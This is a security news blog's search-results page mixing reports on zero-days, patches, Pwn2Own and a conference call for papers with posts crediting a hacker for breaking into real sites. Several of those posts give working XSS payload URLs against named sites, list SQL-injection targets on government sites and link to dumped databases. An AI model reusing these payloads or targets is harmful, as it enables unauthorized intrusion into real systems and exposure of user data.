Showing posts sorted by relevance for query Zero. Sort by date Show all posts
Showing posts sorted by relevance for query Zero. Sort by date Show all posts

XSS in UK Gov sites found by Zero Cool

Posted by Avik Sarkar On 5/10/2011 01:32:00 pm

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

Adobe Flash Zero-day Exploit Which Allowing Others To Use Your Webcam Has Been Patched

Posted by Avik Sarkar On 10/23/2011 05:15:00 pm


A Stanford University student recently discovered a security flaw with Adobe’s Flash Player that allowed malicious users to activate your webcam and microphone without your knowledge. They could then tap into the video and audio to watch and listen to your every move. OK, that sounded a lot less sensationalist in my head. Unfortunately, up until a few days ago, this exploit very much existed and Adobe was working feverishly on a fix. Feross Aboukhadijeh, the aforementioned Stanford student, wrote about the flaw on October 18.
According to Feross Aboukhadijeh:-
"I discovered a vulnerability in Adobe Flash that allows any website to turn on your webcam and microphone without your knowledge or consent to spy on you. It works in all versions of Adobe Flash that I tested. I’ve confirmed that it works in the Firefox and Safari for Mac browsers. Use one of those if you check out the live demo. There’s a weird CSS opacity bug in most other browsers (Chrome for Mac and most browsers on Windows/Linux)."
Video Demo:-


Later Adobe issued a critical update for its Flash Player software. The patch fixes six security vulnerabilities, at least one of which is a zero-day vulnerability being actively exploited in the wild. The details of the Adobe security bulletin explain, "This update resolves a universal cross-site scripting issue that could be used to take actions on a user's behalf on any website or webmail provider if the user visits a malicious website (CVE-2011-2444)," adding, 
"Note: There are reports that this issue is being exploited in the wild in active targeted attacks designed to trick the user into clicking on a malicious link delivered in an email message."
The zero-day bug fixed today is similar to a flaw in Flash that was patched in June. Coincidentally, both the June vulnerability, and this one patched today were reported to Adobe by Google.

To download the Patch and more about Adobe Security Bulletin Click Here 



SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

#CFP - Call For Papers Nullcon Delhi 2012 (International Security Conference)

Posted by Avik Sarkar On 6/06/2012 10:21:00 pm

#CFP - Call For Papers Nullcon Delhi 2012 (International Security Conference)
After the success of Goa, now its the preparation time for nullcon Delhi to showcase cutting edge security technologies and discuss new attack vectors and security threats among the Corporate world and the Government sector. The event brings together thought leaders, Corporates, Government and security professionals all under one roof. Being the official media partner, Team Voiceofgreyhat wishes all the very best for Nullcon Delhi 2012.


Categories:-

The talk time duration includes time for questions and answers (5-10 minutes).
  1. Research Category (40 mins - 1 hr) - is a deep knowledge technical track that includes new research, tools, vulnerabilities, zero days or exploits.
  2. Technical Category (30 mins - 1 hr) - comprises of known security issues, case studies, twist to an existing research, tool, vulnerability, exploit or research-in-progress. Although this track is fairly technical, it covers known techniques and analysis and is specially created for security professionals who are not too much into new research, are auditors, management professionals and newbies.
  3. Desi Jugaad (1 hr) - is our signature research category talk and includes any local Indian/Asian hacks.

Submission Topics:-

  1. One of the topics of interest to us is Desi Jugaad(Local Indian/Asian Hack) and has a separate track of its own. Submissions can be any kind of local hacks that you have worked on (hints: electronic/mechanical meters, automobile hacking, Hardware, mobile phones, lock-picking, bypassing procedures and processes, etc. Be creative!)
  2. The topics pertaining to security and hacking in the following domains(but not limited to):
    • Hardware Hacking(ex: RFID, Magnetic Strips, Card Readers, Mobile Devices, Electronic Devices)
    • Tools/exploits/Zero-days (noncommercial)
    • Programming/Software Development security and weaknesses
    • Network vulnerabilities.
    • Information Warfare, cyber espionage, cyber crime, cyber laws
    • Malware, Botnets
    • Web attacks and application hacking
    • New attack vectors
    • Mobile malware, vulnerabilities, exploits, VOIP and Telecom
    • Virtualization security, hacking VMs, breaking out of VMS etc
    • Cloud security, threats and exploitation
    • Critical Infrastructure
    • Satellite hacking
    • Forensics

Submission Format:-

Email the paper to : cfp@nullcon.net
The subject should be : CFP Delhi 2012 <Paper Title>
Email Body :

  1. Name
  2. Handle
  3. Track (& Time required in case of General/Business track)
  4. Paper Title
  5. Country(and City) of residence
  6. Organization and Designation
  7. Contact Number
  8. Have you presented or submitted this paper at any other conference(s) or magazine(s)?
    Yes, No. If yes, where? and how this submission is different from the previous ones. Note that new research talks already given elsewhere or are due to be given elsewhere prior to nullcon will be considered as Technical category talks unless they consist of cutting edge and ground breaking technology, which is at the judgment of the review committee.
  9. Are you releasing an open source tool?
    Yes/No. (If yes, please include the source code for review)
  10. Are you releasing an exploit?
    Yes/No. (If yes, please include the source and vulnerability details for review)
  11. Are you releasing a new vulnerability/Zero-day?
    Yes/No. (If yes, please send us the details, including reproduction procedure, for review)
  12. Why do you think your paper is different/innovative (for all tracks) and how does it qualify as new work/research(for Research track only)?
  13. Are there any live demonstrations (These earn you good points during review)?
    Yes/No. (If Yes, how many? Also please explain each demo)
  14. Brief Profile ( less than 500 Words)
  15. Paper Abstract - Please provide detailed working or your research/work. The more details you provide the better it is for the reviewers. Please keep the abstract to the point. Please do not try to hide the technical details or say “I can't disclose it till bla bla” as it does not help the reviewers in any way and may give your paper a low score because of insufficient information available in the abstract.
  16. Your high resolution photo (attached)

Important Dates:-

CFP Opens: 25th April 2012
1st round of Speaker list Online: 10th June 2012
CFP Closing Date: 30th June 2012
Final speakers List online: 10th July 2012
Conference Dates: 26th-29th September 2012 


For Detailed Information Click Here 



SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

XSS vulnerability found by zero cool

Posted by Avik Sarkar On 4/29/2011 11:07:00 pm

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

Discovery.com Vulnerable to XSS Said Zero

Posted by VOGH On 7/14/2011 12:39:00 pm


Zero Cool found non-persisting XSS vulnerability on the Official Website of Discovery.

Vulnerable Website:-


Vulnerable Link:-


http://news.discovery.com/search/results.html?focus=site&query=%3E%22%3E%3CMARQUEE%3EHACKED+BY+ZERO+COOL%3C%2FMARQUEE%3E%3Ciframe%2Bsrc%2B%253D%22http%253A%252F%252Fwww.indishell.in%22%2Bwidth%253D%22100%2525%22%2Bheight%253D%22100%2525%22%3E%3C%252Fiframe%3E%26Submit%3DGo&search.x=37&search.y=14&search=search

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

Microsoft Issues 'fix it' To Close Internet Explorer 0-day Vulnerability

Posted by Avik Sarkar On 9/20/2012 05:40:00 pm

Microsoft Issues 'fix it' To Close Internet Explorer 0-day Vulnerability 

Last few days the whole cyber world have gone through with so many drama of Internet Explorer's security bug, as researchers have unveiled four active exploits of a zero-day vulnerability in the browser. As expected the software giant Microsoft has released an emergency fix to get rid of these major security issues. Microsoft released a “fix it” tool for a critical security flaw in most versions of Internet Explorer 6, 7, 8 and 9  that hackers have been exploiting to break into Windows systems. The company said it expects to issue an official patch (MS12-063) for the vulnerability on Friday, Sept. 21. "While we have only seen a few attempts to exploit this issue, impacting an extremely limited number of people, we are taking this proactive step to help ensure Internet Explorer customers are protected and able to safely browse online," said Yunsun Wee, director of Microsoft Trustworthy Computing in a statement. The zero-day in IE 6-9 is a use-after-free memory corruption vulnerability, similar to a buffer overflow, that would enable an attacker to remotely execute code on a compromised machine. The original exploit payload dropped the PoisonIvy remote access Trojan (RAT) via a corrupted Flash movie file. The latest payload discovered dropped the PlugX RAT via the same corrupted Flash movie, Blasco said. He also said the new exploits are the work of the Chinese hacker group Nitro, the same group behind a pair of Java zero-day exploits disclosed in August.

Blasco also said the new exploits appear to be targeting defense contractors in the United States and India.
Microsoft recommended several workarounds Tuesday morning before announcing its intention to send out a FixIt.
  • Setting Internet and local Internet security zone settings to high, which would block ActiveX Controls and Active Scripting in both zones
  • Configure IE to prompt the user before running Active Scripting, or disable Active Scripting in both zones
  • Use of Microsoft's Enhanced Mitigation Experience Toolkit provides mitigations as well, and would not impact website usability, as both of the first two options might.
Microsoft also said that IE running on Windows Server 2003, 2008 and 2008R2 runs in a restricted mode that mitigates the vulnerability. Outlook, Outlook Express and Windows Mail also open HTML messages in a restricted zone, mitigating the vulnerabilty but should a user click a link in a message, they could still be vulnerable to exploit.





SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

Zero-day Exploit in iOS Games Exposed by a Teenagers (10-Year Old Girl)

Posted by Avik Sarkar On 8/09/2011 04:16:00 pm


A 10-year-old California girl’s presentation at a hacker conference in Las Vegas is getting a lot of attention. The girl, who uses the pseudonym “CyFi,” revealed a zero-day exploit in games on iOS and Android devices that independent researchers have confirmed as a new class of vulnerability Zero-day exploits are used or shared by attackers before the developer of the target software knows about the vulnerability. The girl first discovered the flaw earlier this year because she was bored with the pace of farm-style games.
While CyFi isn’t revealing which games are affected, most of them have time-dependent factors. She opened up the exploit by manually advancing a phone or tablet’s clock to force a game ahead in time. Some games block such a trick but the young hacker says she found ways to avoid those detections such as disconnecting the phone from Wi-Fi and making incremental clock adjustments.
CyFi’s presentation was part of DefCon Kids, a new offshoot of the annual hacker convention that features an area where kids can learn how to do things like open master locks, do certain kinds of hacks, code in scratch and communicate in code.
While her presentation at DefCon was her first public vulnerability disclosure, CyFi said she was only a little nervous. An artist, girl scout and downhill skier, she has spoken publically numerous times, usually at art galleries as a member of “The American Show,” an underground art collective based in San Francisco. According to her bio on the DefCon Kids Web site, CyFi has had her identity stolen twice.
Rosenblatt points out that the new DefCon Kids programming reflects that “members of the hacking community are getting older and raising families.”


SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

eEye to Showcase IT Security Solutions that Simplify Vulnerability and Compliance Management at SecureWorld Expo in Atlanta

Posted by Avik Sarkar On 4/27/2011 02:31:00 pm

eEye Digital Security, a provider of IT security and unified vulnerability management solutions, will exhibit at the SecureWorld Expo in Atlanta, Georgia, May 3-4, 2011. The company’s CTO, Marc Maiffret, will participate as an industry expert on a network security panel discussion. The conference brings together the security leaders, experts, senior executives, and policy makers who shape the direction of security across Information Security, Physical Security, Compliance, IT Audit, Computer Forensics, Enterprise Risk Management, Business Continuity, and Security Management.
eEye invites the media and SecureWorld Expo attendees to explore the company's latest innovations, demonstrated in Booth 313, primarily the company’s Retina CS Management solution, Retina Insight reporting engine, as well as add-on modules for Configuration Compliance, Government Regulatory Reporting, and Patch Management.
eEye CTO, Marc Maiffret, will offer insights on the Industry Expert Panel, "Network Security: Finding the Right Management Program," to be held on Tuesday, May 3, 1:15-2:00 PM during the Open Vendor Sessions portion of the conference.
“It’s part of the eEye philosophy to regularly engage in dialogue with other security leaders and the IT security community at large,” said Marc Maiffret, CTO, eEye. “As a speaker on the Network Security panel, I’d like to open communication around some simple, practical tactics that IT professionals can use to significantly improve the security of their organization.”
At the event, eEye will encourage SecureWorld Expo attendees to take advantage of several free, online resources that the company provides to the IT security community. Retina Community is a free vulnerability scanner for up to 32 IPs, now being used by nearly four thousand organizations. Zero Day Tracker provides a catalogue of the newest zero-day vulnerabilities, instructions for quick remediation, and a historical record of past vulnerabilities.eEye’s Vulnerability Expert Forum (VEF), hosted by Maiffret and the eEye Research Team, is a popular monthly webinar attended by hundreds of IT security professionals seeking insight and information on recently announced critical vulnerabilities from Microsoft and other software vendors.
eEye is participating in SecureWorld Expo’s “Dash for Prizes.” Attendees can register at the eEye Booth (313) throughout the two-day conference to win an Amazon Kindle and a $25 gift card. Winners will be announced during the last break of the conference on Wednesday, May 4. Attendees must be present to win.
About eEye Digital Security 
Since 1998, eEye Digital Security has made vulnerability and compliance management simpler and more efficient by providing the only unified solution that integrates assessment, mitigation, protection, and reporting into a complete offering with optional add-on modules for configuration compliance, regulatory reporting, and integrated patch management. eEye’s world-renowned research and development team is consistently the first to uncover critical vulnerabilities and build new protections into our solutions to prevent their exploit. Thousands of mid-to-large-size private-sector and government organizations, including the largest vulnerability management installations in the world, rely on eEye to protect against the latest known and zero-day vulnerabilities. More at eeye.com.

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

XSS vulnerbility in novell.com

Posted by Avik Sarkar On 5/25/2011 01:51:00 pm



Non Persistent XSS Vulnerability found by Zero in novell.com found by Zero

Vulnerable Site:- 
http://www.novell.com/

Vulnerable Link:-
http://www.novell.com/SearchUI/query.action?term=<script>alert("ZERO+WAS+HERE")<%2Fscript>&hdrsrchsubmit.x=0&hdrsrchsubmit.y=0&hdrsrchsubmit=Search



SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

Total 14 Zero-day Vulnerability Found in SCADA By Italian Researcher

Posted by Avik Sarkar On 9/18/2011 02:24:00 pm



An Italian researcher has published details of a new batch of unpatched vulnerabilities found in the SCADA (Supervisory Control and Data Acquisition) products from seven different vendors.
Assessing the significance of the 14 zero-day vulnerabilities explained by Luigi Auriemma in proof-of-concept detail with exploit code is incredibly difficult to do, but they offer an unsettling picture of the flaws that seem to exist in systems normally hidden out of sight. The companies mentioned include Beckhoff, MeasureSoft, Rockwell, Carel, Progea, AzeoTech, and Cogent, products used to control industrial systems across sectors including manufacturing, aerospace, military, and more or less any sector that might use SCADA.
Auriemma has a record of hunting down flaws in SCADA technology, having published 34 zero-day holes in March 2011. He remains unrepentant about his public disclosure of security flaws for which no patches exist.
"I like only to find them [flaws] and releasing the informations (sic) as soon as possible," he explains on his website. "And remember that I find bugs, I don't create them, the developers are the only people who create bugs (indirectly naturally) so they are ever the only responsible."
In the last year SCADA has gone from an obscure albeit important backwater of software security thanks probably to the discovery of a worm called Stuxnet, which was apparently deployed to attack systems used within the nuclear program of Iran over a year period from the summer of 2009 onwards.
Who created it and why has been speculated on ever since, but it was clear that profit-seeking criminals were an unlikely to have been behind it. With many suspecting the involvement of a government, suddenly SCADA seemed like a vulnerable underside for systems across almost every industry in the world.
SCADA exploits, meanwhile, have continued to be made public with disturbing regularity. 

-News Source (PC World & Cnet)


SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

Full Disclosure Of Pentagon Data-breach

Posted by Avik Sarkar On 7/19/2011 01:42:00 pm


We're all human, you know? That's roughly the trick that the hackers most likely relied on when, earlier this year, they managed to steal over 24,000 files from a defense contractor.
The Pentagon won't say what files went astray, or the level of secrecy associated with the contents of the stolen data. But we can assume that at least some of it was highly secret—secret enough that Deputy Defense Secretary William J. Lynn III felt compelled to admit to the attack during a speech about the future of cyber policy yesterday. Lynn said it concerned some of the U.S.'s "most sensitive systems, including aircraft avionics, surveillance technologies" and more, before hinting that foreign powers were behind the attack and using it to declare cyberspace the next battleground.
What went down? Fast Company spoke to Nick Percoco, digital security expert and SVP at Trustwave's SpiderLabs, and familiar with exactly this sort of cyberattack, to get some insight.
How The Hack May Have Begun: Email Scams
The fact that the 24,000 stolen files came from a defense contractor is significant, Percoco notes. It's likely easier to get this sort of data from a contractor than launching an all-out attack on Pentagon servers themselves, because companies are full of people—people who are used to doing business in our digitally connected world. And even though an employee of a defense contractor is probably way more switched on to digital security than you or I, it's still not impossible to cheat someone with access to secret files into placing malware on their work laptop.
All it would take for a dedicated hacker is some basic research. If you wanted to steal data like this, you could start by targeting a particular employee via email—"We've seen this happen to defense contractors," Percoco notes. "Using technology like Google, and LinkedIn and other social networks" hackers could find out who best to target. Say they pick a particular EVP, and work out their email address is "JohnSmith@defencecontractorX.com." Then they work out who their colleagues or bosses may be all the way up to CEO level.
Then it's as simple as going to a source of hacking code using your underworld contacts (or using some of your own) and getting access to a "zero day exploit"—a new loophole in a computer or software system's security that hasn't been publicly discovered yet, and hence is still open for hacking use.
This is where the hack escalates. "In this case, they'd been looking for a zero-day exploit in, say, the Adobe PDF reader. And then they'd take a nice creative pen out and draft up a document that looks like it should be something important," Percoco said. After this, the hacker would set up something like a disposable Gmail account and make the screen name the same as one of the target's peers or the CEO of the company. Then they'd "craft up an email that says 'Here's an important document, some new announcement we're working on. Please review it and be ready for a call at 10 a.m. today.'" The trick is to send this to the target at around 7:30 a.m. local time, because the "best time to send those types of things is right before someone's had their coffee."
Typically the sleep-addled victim would trust the email as it's supposedly from a colleague, then launch the embedded PDF (or other faked document). Usually it causes the newly launched program—Adobe Reader in this example—to crash. But as it crashed, it would actually be installing malicious code on the machine. The virus is injected.
How The Attack Began: Website Sting
A similar attack is possible using a faked-up website that looks like it's actually related to the target company—one of those odd-looking, badly maintained websites that kinda looks official that we've all surfed to at some point and been confused by.
Some of these are actually storage pens for targeted malicious code, carefully honed to appear high on Google searches with SEO tricks. And when, say, a marketing official from the target company Googles to find out how their brand is being referenced around the web, they may stumble across one of these fake sites and trigger the release of malware onto their machine.
What Happened Next: Access Is King
Once the malicious code has been installed on the machine, the "sky's the limit," particularly via the email exploit. A well-coded virus code can evade detection and hide on the computer, doing various wicked things.
Often the "sole purpose of the executable is to go and find files on the person's computer and archive those in a zip file or RAR file, and then attempt to extract them from the system," Percoco said, based on his experience. The code could try lots of different routes, using FTP or HTTP or other protocols to get those files off the system. It's something he's seen in "many environments" and, worryingly, they're often "highly successful in getting those files." The code is typically designed to work on Windows machines, with almost no such exploits targeted at Macs—but Percoco agrees that this is at least partly due to the assumption by a hacker that a business user will be using a PC, not a Mac.
The success would be based on the fact no one's seen this particular kind of attack before (a zero-day exploit payoff) and it would easily circumvent any protective anti-virus software installed on the machine—because the protection doesn't know to look out for this type of virus. The only real way to avoid this sort of attack for the target to "avoid clicking on documents," which is clearly unlikely in the case of a business computer user. 
A smarter hacker would select a network administrator at the target company, because they're human, too. Their machine likely has even more interesting files that have data on network security, what kind of code is let in and let out of company firewalls, and so on.
Getting access to this sort of data (via the same email hack as described above) could let a persistent hacker penetrate a company's network and install a backdoor onto it—totally circumventing security because then "the attacker doesn't have to come in from the outside, they have code running on that system that will basically open up a connection back to the attacker"—not something network security is expecting. Then you can gain access to passwords and credentials to worm your way in further, eventually finding whatever sensitive data you're looking for.
The result could be a grim violation of company security. "We've seen those for a number of years, in all sorts of companies including government-type companies as well," Percoco says. 
Who Did This?
It's easy to see how a hacker could gain access to a machine and even a company network, and how easy it can be to transfer stolen files from infected computers to the hacker. But whois the hacker? The Deputy Secretary of Defense was careful to link it to "foreign" attackers—and considering this year's hacking news, we're instantly imagining China is to blame.
Percoco says his company does hundreds of investigations every year on attacks like these, and it's "very, very difficult to trace an attack to a specific person and specific political motivation." That's unless it's a hacktivist attack, when a group like Anonymous posts the data online and admits it was to blame—and even then "you don't know where these people are actually located."
A hacker could take his laptop down to a coffee shop, buy a cup of joe and "get on their free Wi-Fi system. And now they go and start looking around the world to find a computer that has a security weakness." Once they find it, they can use the hacked computer for a targeting scenario like the one described above, where they send a tainted email. Anyone tracing the code back after the attack was detected may find it sourced on a corporate computer in, say, China. And then they're stuck—because no one's "going to let the U.S. government come in and do a forensic investigation on some business located in China." 
Furthermore, it's rare that even this first Net address is where the attack is coming from—"they're always jumping through one or many systems" Percoco says, which could be in numerous nations and thus completely confound any attempts to track them. Which means the attacker actually could be located anywhere.
The Cold Cyberwar?
Suddenly, there's a much more sinister angle to the Pentagon hack. Forget "The Chinese Way of Hacking." More like "Even More Malicious Hackers Looking Like They're Using The Chinese Way Of Hacking."

-News Source (Gizmodo)

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

Pwn2Own 2013 Result: Chrome, Firefox, IE, Adobe Reader, Flash & Java Owned

Posted by Avik Sarkar On 3/11/2013 02:55:00 am

Pwn2Own 2013 Result: Chrome, Firefox, IE, Adobe Reader, Flash & Java Owned Only Safari Survived 

Couple of months ago we have talked about 'Pwn2Own 2013' hacking contest sponsored by HP TippingPoint, ZDI and Google where the most famous and widely used browsers have to face challenges. Now the result of this long awaited security competition has came which is showing that the entire browser security landscape can change in a single day, as browsers thought to be secure are proven to be otherwise. Of the Big Four browsers, only Apple's Safari has so far survived the onslaught of the browser-breakers where Chrome, Internet Explorer 10 and Firefox all fell to the mercy of the hackers. Not only browsers but also three other popular applications that is Adobe Reader, Flash Player and yet again Java fallen victim to hackers at 'Pwn2Own'. And for Java it was a true disaster as Java fell three times, though under the contest rules, only the first attacker was due to win the $20,000 prize. Vupen, a renowned security research firm based in France, cracked both Firefox and Internet Explorer. It roughly explained the attack in a tweet, “We’ve pwned Firefox using a use-after-free and a brand new technique to bypass ASLR/DEP on Win7 without the need of any ROP.” This bug hint leads them winning $100,000 for finding a huge hole. Again in a tweet, Security firm Vupen explained “We’ve pwned MS Surface Pro with two IE10 zero-days to achieve a full Windows 8 compromise with sandbox bypass.” Lastly, U.K.-based security firm MWR Labs cracked Chrome and also gained full control of the operating system, this time Windows 7. It also “demonstrated a full sandbox bypass exploit.” The company explained in a blog post that it found a zero-day in Chrome “running on a modern Windows-based laptop.” It was able to exploit the vulnerability by performing a very similar attack to what took down Facebook, Microsoft, and a number of other well-known companies: It had the laptop visit a malicious website. 

Now lets take look at the final score board of Pwn2Own 2013:

Wednesday:
1:30 - Java (James Forshaw) PWNED
2:30 - Java (Joshua Drake) PWNED
3:30 - IE 10 (VUPEN Security) PWNED
4:30 - Chrome (Nils & Jon) PWNED
5:30 - Firefox (VUPEN Security) PWNED
5:31 - Java (VUPEN Security) PWNED

Thursday:
12pm - Flash (VUPEN Security) PWNED
1pm - Adobe Reader (George Hotz) PWNED
2pm - Java (Ben Murphy via proxy) PWNED


The total damage to the prize fund comes out at a whopping $480k. With HP's announcement that everyone will get paid for each attack, the prize monies will be divvied up as follows:-

  1. James Forshaw: Java = $20K
  2. Joshua Drake: Java = $20k
  3. VUPEN Security: IE10 + Firefox + Java + Flash = $250k
  4. Nils & Jon: Chrome = $100k
  5. George Hotz: Adobe Reader = $70k
  6. Ben Murphy: Java = $20k
As you all know that the main motive of these contest is to make applications, software more safe and secure while figuring out hidden vulnerabilities  Here also for Pwn2Own the security holes figured out by the above experts have already been submitted and taken carefully by those organization  along with that, the expected patch for the browsers have already been released. Those who are still using the older version of those above applications are requested to update their system. So, stay tuned with VOGH and be safe on the Internet. 


 -Source (HP, Naked Security) 








SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

Vulnerability Found By Zero on 2 Bangladeshi Govt. Website

Posted by VOGH On 9/04/2011 03:00:00 pm

I-frame  Vulnerability found By Zero on 2 Bangladeshi Govt. website. One is the official website of Supreme Court of Bangladesh & another is Digital Bangladesh.

Vulnerable Sites:-

www.digitalbangladesh.gov.bd
www.supremecourt.gov.bd

Supreme Court of Bangladesh:-

 


Digital Bangladesh:-

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

Critical Zero-Day Vulnerability In Windows 7 (Exploitable Via Apple's Safari Browser)

Posted by Avik Sarkar On 12/24/2011 04:23:00 pm


Highly critical Zero-day vulnerability found in Windows 7. This security flaws can be exploited via Apple Safari browser.  This was first made public via a twitter user named w3bd3vil 

"<iframe height='18082563'></iframe> causes a BSoD [blue screen of death] on win 7 x64 via Safari. Lol!"


It is reported that vulnerability affects fully patched Windows 7 Professional 64-bit and cautioned that other versions may be affected. The remotely exploitable vulnerability, caused by an error in win32k.sys, enables a hacker to run arbitrary code -- such as malware -- on a victim's machine when he or she visits a specially crafted Web page using Safari. Specifically, the Web page would simply need to contain an iFrame -- an HTML element that is typically used to pull content from other sources onto a Web page -- with an overly large "height" attribute.



SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

Theexpert Server Rooted By Zero (TGH)

Posted by Avik Sarkar On 10/30/2011 04:27:00 pm


Theexpert server has been rooted by Zero, Indian Hacker from Team Greyhat (TGH). He hacked all the domains hosted on that server.

List of Hacked Sites & Mirrors:- 
http://pastebin.com/dc40Byn6

 

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

Railway Website of Srilanka is SQL-i Vulnerable (DB Hacked By Zero)

Posted by VOGH On 9/02/2011 04:22:00 pm

The official website of Srilankan Railway railway.gov.lk is vulnerable to SQL-i said Zero. He also hacked into the database and exposed secretes information like DB name, DB Table, admin details & other online user details.


Vulnerable Website:- 
http://www.railway.gov.lk/

To see the hacked DB click Here



SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

ProFTPD Zero Day Vulnerability Fixed

Posted by Avik Sarkar On 11/11/2011 05:57:00 pm



The Zero Day Initiative in ProFTPD closed. The Project developers have released versions 1.3.3g and 1.3.4 of their open source FTP server. Previously ProFTPD 1.3.4 addresses a critical use-after-free memory corruption error in the response API code. In the official release note The ProFTPD Project developers has confirmed that Telnet IAC stack overflow vulnerability has been fixed.

Brief About The Vulnerability:- 
This vulnerability is located within the ProFTPd daemon and occurs due to the way the server manages pools that are used for responses send by the server to the client. When attempting to handle an exceptional condition the server will fail to restore a pointer that is used to contain an ftp response, and as such can be used to trigger a controlled memory corruption. 
The core of this vulnerability is described in the following function which is located in src/main.c. The r_cmd_dispatch_phase function is responsible for dispatching calls to any of the commands that are registered in the proftpd modules/ list. Upon entry of this function, the server essentially pushes the state of the resp_pool for it to be restored upon return. However, if an error occurs while executing a precmd the server will fail to restore the state. These are done with the pr_response_get_pool() and pr_response_set_pool(...)
functions.

Now the new Versions of ProFTPD, I mean 1.3.3g and 1.3.4 of ProFTPD are available. 

To download them click Here


SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

Metasploit declared $5,000.00, in 5 weeks for exploits Bug Bounty program

Posted by Avik Sarkar On 6/15/2011 04:54:00 pm


If you've got a way to crack Google Chrome, the Metasploit team wants to pay you for it. Today Rapid 7 announced that it has a total of $5000 in cash to reward to contributors who send in exploits for its Top 5 or Top 25 vulnerability lists. The exploits have to be submitted, and accepted, as modules under its standard Metasploit Framework license. 
Cash for bugs is a controversial but common way for security firms to encourage hackers to send exploits to the white hats. As far as Bug Bounty programs go, Metasploit's program is meager. But for an open source program that relies on contributions sent in for free, it's an interesting experiment. The program will end quickly, lasting only five weeks (July 20). One fun thing that the team is doing is letting people stake a claim to their exploit of choice from their Top 5 (prize is $500) or Top 25 (prize is $100) lists. After claiming an exploit, hackers get a week to submit their Metasploit module for their chosen bug. The prize money will "only be paid out to the first module contributor for a given vulnerability," the Metasploit team says.
And guess what? Denial of Service exploits won't qualify. Metasploit wants your bug to be able to do more than that. It should also bypass ASLR/DEP when applicable and be geared toward English-based targets. Metasploit wants hackers to follow its hacking guidelines and they cannot be residents of a US embargoed country.
All accepted submissions will not only win a bit of cash but their submissions will be made available to other Metasploit users, again under the Metasploit Framework license (3-clause BSD).
As I look at the list of 30 possible exploits while writing this blog post, I see that only two have been claimed so far. CVE/ZDI 2011-1218, Lotus Notes - Autonomy Keyview(.zip attachment), and an exploit not listed in the CVE database, known as " DATAC RealWin On_FC_CONNECT_FCS_LOGIN packet containing a long username." So plenty of room for participants remains.
The cash-for-bugs program is interesting, but the list of vulnerabilities for which Metasploit is seeking help is even more so.

The Top 5 are for specific holes in ...
  1. Google Chrome (before 11.0.696.71)
  2. Lotus Note
  3. IBM Tivoli Directory Server
  4. DNS
  5. GDI
In the Top 25, the entries on the list that caught my eye include holes in JScript, VBScript Scripting Engines, JBOS, Oracle VM and Citrix, among others. (Yes, browsers are in there, too, including Firefox, Chrome and Opera).
Of course, if you do have a killer bug, particularly for some of the browsers like Firefox or Chrome you can perhaps earn more than $100 for it. Mozilla's Bug Bounty program pays up to $3000 cash reward and you get a Mozilla T-shirt. For web applications or services related security bugs, Mozilla pays from $500 to $3,000. In January, Google plunked out what was then a record reward, $3,133, to a hacker for reporting a flaw Chrome. (Google raised its bug bounty fee about a year ago, from $1,337 after Mozilla bumped up its reward rate to $3,000).
TippingPoint, known as one of the founders of the bug bounty concept, not only pays cash (as much as $5,000 for your zero-day), but it also awards bonus points in a scheme more complicated than an airline mileage rewards program. Participants earn points for referring others into the program, for each zero-day they submit and so on. These points gain you bonuses for your hacks, and other goodies like all-expense-paid trips to hacker conferences like Black Hat.
Who knew hacking could be so rewarding?

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

vulnerability found by zero in multiple Pakistan gov site

Posted by Avik Sarkar On 5/29/2011 04:09:00 pm


Vulnerability found by zero in multiple Pakistan gov site

Vulnerable Website:- 
http://www.lesco.gov.pk/

Exposed DB Link:-
http://pastebin.com/PwS73kAu



XSS in National Electronic power regulatroy authority website of Pakistan

Vulnerable Webiste:- 
:http://www.nepra.org.pk/


Vulnerable Link:-
http://www.nepra.org.pk/searchresult.html?sw=%3E%22%3E%3CMARQUEE%3EHACKED%20BY%20ZERO%20COOL%3C/MARQUEE%3E%3Ciframe+src+%3D%22http%3A%2F%2Fwww.voiceofgreyhat.com%22+width%3D%22100%25%22+height%3D%22100%25%22%3E%3C%2Fiframe%3E&amp;Submit=Go&amp;btnG=Search&amp;site=default_collection&amp;client=default09&amp;proxystylesheet=default09&amp;output=xml_no_dtd



Vulnerable Webiste:- 
http://fesco.com.pk/

Vulnerable SQL-i Link:-
http://fesco.com.pk/GRID-STATION/grid-user-pass.asp

Directory traversel Vulnerability on Islamabad Electric Supply Company,with this vulnerability remote user can easily see the content without logged in to admin area

Vulnerable Website:-
http://www.iesco.com.pk/



Pakistan construction association admin panel hacked
Vulnerable Website:-
http://www.apca.org.pk/

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

Oracle Released Emergency Update to Patch Java 0day (CVE-2012-4681)

Posted by Avik Sarkar On 8/31/2012 06:06:00 pm

Oracle Released Emergency Update to Patch Java 0day (CVE-2012-4681)

Zero-day vulnerabilities in Java, which was on the spotlight for last few days; takes a new direction. Several security firms have already declared that, this newly found Java exploit had been added to Blackhole, a popular hacker's tool that bundles numerous exploits and tries each in turn until it finds one that will work against a personal computer. As expected  Oracle has released an emergency update to address those zero-day vulnerabilities. This Security Alert addresses security issues CVE-2012-4681 (US-CERT Alert TA12-240A and Vulnerability Note VU#636312) and two other vulnerabilities affecting Java running in web browsers on desktops. These vulnerabilities are not applicable to Java running on servers or standalone Java desktop applications. They also do not affect Oracle server-based software.
These vulnerabilities may be remotely exploitable without authentication, i.e., they may be exploited over a network without the need for a username and password. To be successfully exploited, an unsuspecting user running an affected release in a browser will need to visit a malicious web page that leverages this vulnerability. Successful exploits can impact the availability, integrity, and confidentiality of the user's system.
